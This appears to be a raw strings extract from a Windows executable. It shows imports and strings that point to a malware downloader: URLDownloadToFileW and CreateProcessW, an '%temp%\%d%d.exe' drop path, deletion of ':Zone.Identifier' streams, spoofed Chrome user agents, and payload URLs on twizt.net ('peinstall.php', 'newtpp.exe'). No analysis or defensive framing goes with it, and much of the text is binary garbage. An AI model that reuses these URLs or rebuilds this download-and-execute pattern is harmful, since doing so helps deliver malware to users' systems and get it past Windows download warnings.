!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
L$$QRj
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
http://twizt.net/peinstall.php
PathFileExistsW
SHLWAPI.dll
memset
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
InternetCloseHandle
InternetReadFile
InternetOpenUrlW
InternetOpenW
InternetOpenUrlA
InternetOpenA
WININET.dll
URLDownloadToFileW
urlmon.dll
CreateProcessW
DeleteFileW
CloseHandle
WriteFile
CreateFileW
ExpandEnvironmentStringsW
GetTickCount
GetModuleHandleA
GetStartupInfoA
KERNEL32.dll
wsprintfW
USER32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
151Y1j1
2 2&2.2
32393t3z3
4$4)4M4T4[4b4h4p4v4}4
4$5H5X5x5~5
%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
%s:Zone.Identifier
%s\%d%d.exe
%s:Zone.Identifier
%temp%
%s\33573537.jpg
http://twizt.net/newtpp.exe